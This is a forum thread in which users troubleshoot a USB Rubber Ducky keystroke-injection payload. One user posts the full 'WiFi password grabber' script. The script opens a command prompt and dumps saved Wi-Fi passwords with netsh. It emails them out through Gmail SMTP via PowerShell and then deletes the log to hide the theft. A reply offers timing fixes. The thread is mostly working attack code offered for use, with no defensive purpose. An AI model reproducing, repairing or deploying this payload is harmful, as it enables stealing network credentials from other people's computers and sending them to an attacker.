Jump to content

Recommended Posts

Posted

I'm new to the ducky and was just trying a sample script. This one - https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber

For the most part the script works well expect the last part of the script isn't executing. It exits powershell, but never deletes the Log.txt file and never exits the command prompt. In fact it looks like it never attempts to do it. This is on Windows 10. Anyone else experience this? I tried searching the forum, but didn't see a similar post. Thanks!

 


REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

I also tried 

 


REM --> Delete Log.txt and exit
STRING del Log.txt
ENTER
STRING exit
ENTER
Posted

Hey futsec,

When you plug in the duck to a computer it needs to install drivers for the HID, which is the Duck.

 

so,

You should try the DELAY command to the top of your script, and else where like so:

DELAY 3000
REM --> Delete Log.txt and exit
DELAY 150
STRING del Log.txt
ENTER
DELAY 150
STRING exit
ENTER

You need to use the delay command in between some commands so the computer has enough time to process the information before you spam it with key strokes again.

 

Posted

p1ph - thanks for the response. The text I posted is only the bottom part of the script. I am using the complete script that is in the link in my original post. Here is the complete script with the delay in place. 

 

REM Title: WiFi password grabber
REM Author: Siem
REM Version: 3
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account.
DELAY 3000

REM --> Minimize all windows
WINDOWS d

REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000

REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER

REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER

REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER

REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER

REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER

REM --> Delete A.txt
STRING del A.txt
ENTER

REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER

REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER

REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...